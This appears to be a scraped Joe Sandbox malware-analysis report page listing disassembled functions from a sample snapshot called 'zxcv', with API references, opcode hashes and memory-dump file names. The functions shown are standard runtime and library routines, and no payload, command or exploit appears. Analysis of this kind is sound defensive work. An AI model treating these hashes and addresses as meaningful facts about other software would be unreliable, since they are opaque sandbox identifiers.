Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: AdjustPointer
String ID: u:$
API String ID: 1740715915-3033614593
Opcode ID: a300e3c94aa753141e87634edb3722151db52199ecf3adc6277862b78b5ba39a
Instruction ID: c6915a7d15a751be8616e2265c740ee8399e78e317a5e47621aedf76e4f23a9c
Opcode Fuzzy Hash: a300e3c94aa753141e87634edb3722151db52199ecf3adc6277862b78b5ba39a
Instruction Fuzzy Hash: D851DE72620606EFEB2D8F14D841B7BB7A4EF44710F15452EE8058BA91E775ECE4CB90

Function 002872C9 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00287350
__alloca_probe_16.LIBCMT ref: 00287411
__freea.LIBCMT ref: 00287478
__freea.LIBCMT ref: 0028748D
__freea.LIBCMT ref: 0028749D

Memory Dump Source

Source File: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: __freea$__alloca_probe_16
String ID:
API String ID: 3509577899-0
Opcode ID: 3eda1095a81eb561e4a6777fe3fc9db5f599a1c538b2611e19a43ab3c9b77fea
Instruction ID: f267b9b188e971fb11d2534f9863e00658a5188c59e2660e32af0ec859312d8a
Opcode Fuzzy Hash: 3eda1095a81eb561e4a6777fe3fc9db5f599a1c538b2611e19a43ab3c9b77fea
Instruction Fuzzy Hash: 6E51C67662621BAFEB206E64CC41EBF7AA9EF04350B254168FC08D7190E7B0DD709B60

Function 00249AF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00249B2F
__IsNonwritableInCurrentImage.LIBCMT ref: 00249BE3

Strings

u:$, xrefs: 00249BFC
csm, xrefs: 00249BCD

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm$u:$
API String ID: 3480331319-3380186878
Opcode ID: f6c304f591ff5b19dacd0d3b620483d7c1004435d6a09ce0b32bea014bc11f51
Instruction ID: fa496b6853b27c9981acda4db83c653bb6e8254f50ed3fac3d660905df1e8b57
Opcode Fuzzy Hash: f6c304f591ff5b19dacd0d3b620483d7c1004435d6a09ce0b32bea014bc11f51
Instruction Fuzzy Hash: CF410330A202199FCF04DF69D884A9FBBB1FF45328F148099E8145B392C771EAA1CF91

Function 00247E2C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(E06D7363,00000001,00000003,Q<$,?,00000000,?,?,00243C51,00000000,0026CFA4,00000000), ref: 00247E8C

Strings

u:$, xrefs: 00247E5C
Q<$, xrefs: 00247E37
Q<$, xrefs: 00247E79, 00247E7C

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ExceptionRaise
String ID: Q<$$Q<$$u:$
API String ID: 3997070919-2764204758
Opcode ID: 3af0a55d87158a1f14f7fa381f49d8aef7b9447312f2d4ad16c7c9ae7300be52
Instruction ID: 530fe07bec86b92cf45c972266f07f8fc62e17841bc5d53b94d6dd154c7107be
Opcode Fuzzy Hash: 3af0a55d87158a1f14f7fa381f49d8aef7b9447312f2d4ad16c7c9ae7300be52
Instruction Fuzzy Hash: 5A01F731A002099FCB059F58D844B9EBBB9FF44700F054199EA149B350D770DD00CBD0

Function 0024AE32 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0024ADE3,00000000,00000000,?,?,?,?,0024AF0D,00000002,FlsGetValue,00265DE0,FlsGetValue), ref: 0024AE3F
GetLastError.KERNEL32(?,0024ADE3,00000000,00000000,?,?,?,?,0024AF0D,00000002,FlsGetValue,00265DE0,FlsGetValue,00000000,?,00249D9D), ref: 0024AE49
LoadLibraryExW.KERNEL32(?,00000000,00000000,00265DE0,FlsGetValue,00000000,?,00249D9D), ref: 0024AE71

Strings

api-ms-, xrefs: 0024AE56

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 78554d7500e7d930ba42e11cc424396c9c6fbcc13ac61cfaba63668eb4dfc50c
Instruction ID: f09f6eb6bc95732d24104462e37664d27842f5fb13e25047239a79a225e36ede
Opcode Fuzzy Hash: 78554d7500e7d930ba42e11cc424396c9c6fbcc13ac61cfaba63668eb4dfc50c
Instruction Fuzzy Hash: 38E048743D0615B7DF242F70FC0AB1A3E599F10B50F104030FB4DA40E1E7A299609589

Function 0025600A Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(914AA853,00000000,00000000,00000000), ref: 0025606D

Part of subcall function 0025A759: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00259E36,?,00000000,-00000008), ref: 0025A805

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002562C8
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00256310
GetLastError.KERNEL32 ref: 002563B3

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 88051e3a42efdfd6eb8228b772e733f3dd00f2db96b7d1f485de43401ef55fd9
Instruction ID: 120c21b873c8e92f95c169c08d7f16d0c1a3b6d82b1c2993583f6347998672b8
Opcode Fuzzy Hash: 88051e3a42efdfd6eb8228b772e733f3dd00f2db96b7d1f485de43401ef55fd9
Instruction Fuzzy Hash: F9D1BB75E10259AFCF05CFA8D884AADBBB5FF08300F18816AE856EB351DB30A855CF54

Function 00278B59 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00278C20
___AdjustPointer.LIBCMT ref: 00278C43
___AdjustPointer.LIBCMT ref: 00278CDF

Memory Dump Source

Source File: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: d95edfa48ed7d5b6bb91a825a2d964fdf8877f62f468544baf2dcb66ebf8e1e5
Instruction ID: dbb5fa047bad7ededc513797c434e7f3ac88e235f748e837e71f2874b1818529
Opcode Fuzzy Hash: d95edfa48ed7d5b6bb91a825a2d964fdf8877f62f468544baf2dcb66ebf8e1e5
Instruction Fuzzy Hash: A751D2716626029FDB2A9F14C889BAA77A4EF04310F14C52EE90D87291DF71EC60DBA0

Function 0025AB75 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0025A759: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00259E36,?,00000000,-00000008), ref: 0025A805

GetLastError.KERNEL32 ref: 0025ABD9
__dosmaperr.LIBCMT ref: 0025ABE0
GetLastError.KERNEL32(?,?,?,?), ref: 0025AC1A
__dosmaperr.LIBCMT ref: 0025AC21

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 31042a6598bb4c687ee26d812daa47199fcf3051ae6b28e6c1ef3b4171f6ceca
Instruction ID: e5927199b7e3a63b6ea20a2003920cf1315ad2b0f9613514c618b8ff23f49d6e
Opcode Fuzzy Hash: 31042a6598bb4c687ee26d812daa47199fcf3051ae6b28e6c1ef3b4171f6ceca
Instruction Fuzzy Hash: 7E21077123020AAFCB21AF61CC82C2BB7A9FF54366700862AFC1887140D770EC348F99

Function 0025062A Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d20e82d5faa88f8203e517b6b1d8ee39d0684943947f9ec96aeeeb21f29b6db
Instruction ID: 83c012fdfe05e4378f4b0825e9ccafd118b166e8db9ddfa64c72c3bf821e3ada
Opcode Fuzzy Hash: 4d20e82d5faa88f8203e517b6b1d8ee39d0684943947f9ec96aeeeb21f29b6db
Instruction Fuzzy Hash: 0621A131620206AFDB20AF619DC096BB7ACEF84366B144525FC1897151D770EC34CFA8

Function 0025BB24 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0025BB2C

Part of subcall function 0025A759: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00259E36,?,00000000,-00000008), ref: 0025A805

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0025BB64
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0025BB84

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 52562e82439da3d3bbe2d5ace1bf061ed34599daedec8a9be85845418fd2f626
Instruction ID: 8c12fc89063b6155d66d9c2e30eb270e16336ee1b34f73ca04545e086dfcf56f
Opcode Fuzzy Hash: 52562e82439da3d3bbe2d5ace1bf061ed34599daedec8a9be85845418fd2f626
Instruction Fuzzy Hash: DF11C4B153191A7F6B122BB1ACCFD6F69ACDE493AB3110164FC45D1100EBF0CD698A79

Function 00278A42 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00278A5E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00278A77

Memory Dump Source

Source File: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 51cd9874fd3a8acb1ddbd7e7b37be44bd02351f2607f363f7431005301993e19
Instruction ID: ae5bb33a6d24a26f9cc09ec9adfaf88ab827de32152a4485abac40bcc396737b
Opcode Fuzzy Hash: 51cd9874fd3a8acb1ddbd7e7b37be44bd02351f2607f363f7431005301993e19
Instruction Fuzzy Hash: 04014C3237A7125EAB391B757D8EA672A94EB51371330433FF21C922E1EF714C215944

Function 00241DE3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00241DEF
int.LIBCPMT ref: 00241E02

Part of subcall function 00242A9D: std::_Lockit::_Lockit.LIBCPMT ref: 00242AAE
Part of subcall function 00242A9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00242AC8

std::_Facet_Register.LIBCPMT ref: 00241E35
std::_Lockit::~_Lockit.LIBCPMT ref: 00241E4B

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 380ea1246bf3c5fcf0dc6b97e0d9626bec9aa91c69e5b8f0e9fce2077016d602
Instruction ID: d08cf97f5d4258532dc835ccbc7004a9a4af806705d42950c97f9b33e8b0bc50
Opcode Fuzzy Hash: 380ea1246bf3c5fcf0dc6b97e0d9626bec9aa91c69e5b8f0e9fce2077016d602
Instruction Fuzzy Hash: F101DB3A620524EBCB1EEF94D8468AD7768DF84760F200159F8159B291EF30AE61CF90

Function 00241E5C Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00241E68
int.LIBCPMT ref: 00241E7B

Part of subcall function 00242A9D: std::_Lockit::_Lockit.LIBCPMT ref: 00242AAE
Part of subcall function 00242A9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00242AC8

std::_Facet_Register.LIBCPMT ref: 00241EAE
std::_Lockit::~_Lockit.LIBCPMT ref: 00241EC4

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: dc1f620eb3e40b47df1750fc2f57445710bf4eb92c4d0d9903692ea238cc2dda
Instruction ID: 9bab866542b36ec38e76d9fe3c066cb7b4b8b745875c6cd0f7186dd74681bbce
Opcode Fuzzy Hash: dc1f620eb3e40b47df1750fc2f57445710bf4eb92c4d0d9903692ea238cc2dda
Instruction Fuzzy Hash: EB01DB3A920524EBCB1EEF64DC468AD77A8DF40360B200559FD05AB291EF30AE61CFD0

Function 00241ED5 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00241EE1
int.LIBCPMT ref: 00241EF4

Part of subcall function 00242A9D: std::_Lockit::_Lockit.LIBCPMT ref: 00242AAE
Part of subcall function 00242A9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00242AC8

std::_Facet_Register.LIBCPMT ref: 00241F27
std::_Lockit::~_Lockit.LIBCPMT ref: 00241F3D

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: a68fe93dcbf02df5a2dd72236b30e18880cc6ecd94bb7913fdd46a430b12d591
Instruction ID: a2e5e3b4c97d3d48c55f51ff106b850a7b23445baed7e3ec4f6080f299ea3033
Opcode Fuzzy Hash: a68fe93dcbf02df5a2dd72236b30e18880cc6ecd94bb7913fdd46a430b12d591
Instruction Fuzzy Hash: 91012B76530525ABCB1EEF55D8068AD77A8DF40760B110149F805AB291DF30AE61CF80

Function 00241F4E Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00241F5A
int.LIBCPMT ref: 00241F6D

Part of subcall function 00242A9D: std::_Lockit::_Lockit.LIBCPMT ref: 00242AAE
Part of subcall function 00242A9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00242AC8

std::_Facet_Register.LIBCPMT ref: 00241FA0
std::_Lockit::~_Lockit.LIBCPMT ref: 00241FB6

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 92c6f17487b8f748d56cc3f6f6de26e616d7aa497a35b468a34de46a92635ab1
Instruction ID: 5ae4a8bf49c7f9a88742e54936f11dc879a22e06efe6e2ada540ce59b1405f50
Opcode Fuzzy Hash: 92c6f17487b8f748d56cc3f6f6de26e616d7aa497a35b468a34de46a92635ab1
Instruction Fuzzy Hash: 9A01DB36920624EFCB1DEF54D9458AD77A8EF40360B210655F905AB291EF30EF65CB90

Function 00261C31 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,0025EC4A,00000000,00000001,00000000,00000000,?,00256407,00000000,00000000,00000000), ref: 00261C48
GetLastError.KERNEL32(?,0025EC4A,00000000,00000001,00000000,00000000,?,00256407,00000000,00000000,00000000,00000000,00000000,?,002569C5,00000000), ref: 00261C54

Part of subcall function 00261C1A: CloseHandle.KERNEL32(FFFFFFFE,00261C64,?,0025EC4A,00000000,00000001,00000000,00000000,?,00256407,00000000,00000000,00000000,00000000,00000000), ref: 00261C2A

___initconout.LIBCMT ref: 00261C64

Part of subcall function 00261BDC: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00261C0B,0025EC37,00000000,?,00256407,00000000,00000000,00000000,00000000), ref: 00261BEF

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,0025EC4A,00000000,00000001,00000000,00000000,?,00256407,00000000,00000000,00000000,00000000), ref: 00261C79

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: c5b5696a8cdc5320459686abbfa269dcfb76e72a659efbc96a25a3541afeb60e
Instruction ID: 2c6baafe8221ac2cbd806c96e60e10d4f631521886b38b82db28928fad2d079f
Opcode Fuzzy Hash: c5b5696a8cdc5320459686abbfa269dcfb76e72a659efbc96a25a3541afeb60e
Instruction Fuzzy Hash: 52F01C36450165BBCF622FD5EC0898E3F66FB197A1F044010FA5885131CA72A8B0AB91

Function 0028B1C5 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 373COMMON

Download Yara Rule

Strings

AC, xrefs: 0028B1F3
AC, xrefs: 0028B4D8

Memory Dump Source

Source File: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID:
String ID: AC$ AC
API String ID: 0-2553023829
